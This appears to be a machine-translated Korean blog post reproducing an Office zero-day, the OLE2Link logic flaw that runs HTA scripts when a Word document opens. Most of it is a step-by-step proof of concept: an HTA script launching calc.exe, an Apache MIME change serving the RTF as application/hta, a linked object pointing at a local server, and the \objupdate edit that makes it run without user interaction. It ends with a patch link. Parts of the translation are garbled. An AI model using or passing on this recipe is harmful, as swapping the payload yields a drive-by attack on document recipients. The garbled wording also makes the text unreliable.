최신 OFFICE 0day 취약점 분석

취약점 개요

fireeye는 최근 사용자의 상호작용 없이 워드 문서를 열면hta 스크립트를 통해 임의의 코드를 실행할 수 있는 OFFICE 0day를 발표했다.연구를 통해 이 빈틈의 원인은 주로 워드가 OLE2LINK 대상을 처리할 때 네트워크를 통해 대상을 업데이트할 때 정확하게 처리하지 않은 Content-Type으로 인한 논리적 빈틈이라는 것을 발견했다.
 

취약점 활용 방법

우선 아파치 서버를 준비하고 웹 루트 디렉터리에 1을 저장합니다.rtf 파일의 내용은 다음과 같습니다.

test789

var objShell = new ActiveXObject("wscript.shell");
objShell.Run("%SystemRoot%\\system32\\calc.exe");

apache 프로필 conf/mime.types에는 rtf의 콘텐츠 type 항목이 있습니다.

application/rtf                 rtf

워드로 공백 문서를 만들고 그 안에 대상을 삽입합니다.
파일로 만들기를 선택하고 웹 서버에 입력하십시오.rtf의 URL입니다. [파일로 링크]를 선택해야 합니다.
이 때test789 텍스트에 삽입된 대상이 있는 문서를 생성합니다. 이 문서를 두 번 클릭하면 rtf 파일 방식으로만 대상을 열 수 있고 hta 스크립트를 실행할 수 없습니다.대상을 만들 때 '파일로 링크' 를 선택하기 때문에, 대상을 열 때 서버에 요청합니다http://192.168.1.108/1.rtf를 참고하십시오.
아파치 프로필 conf/mime.types

application/rtf                 rtf

다음으로 수정됨:

application/hta                 rtf

apache를 다시 시작하면 IE 캐시를 지웁니다.
객체를 두 번 더 클릭합니다.rtf 파일이지만 서버의 Content-type은 응용 프로그램/hta를 반환하고 word는 hta 스크립트로 파일을 엽니다.
이런 Poc는 사용자가 대상을 두 번 눌러서 상호작용을 해야 하는데 어떻게 해야만 자동으로 대상을 운행할 수 있습니까?파일을 rtf 형식으로 저장해야 합니다.
텍스트 편집기를 사용하여 저장된 rtf 파일을 열고 object 태그가 있는 곳을 찾습니다.
자루

{\object\objautlink\rsltpict

다음으로 수정됨:

{\object\objautlink\objupdate\rsltpict

파일을 저장하고 다시 엽니다.사용자 상호 작용 없이 hta 스크립트 팝업 계산기를 직접 실행할 수 있습니다.
관건은objupdate입니다. 이 탭의 역할은 자동으로 대상을 업데이트할 수 있기 때문에 사용자의 상호작용이 필요 없습니다.이때 hta 스크립트를 통해 임의의 코드를 집행하는 목적을 달성할 수 있고 hta 스크립트는 팔선이 바다를 건너 각자 신통력을 발휘할 수 있다.
 

복구 방안

Microsoft 긴급 업데이트 패치를 다운로드하려면 다음과 같이 하십시오.https://support.microsoft.com/en-us/help/4014793/title
전재 대상:https://www.cnblogs.com/wh4am1/p/6741119.html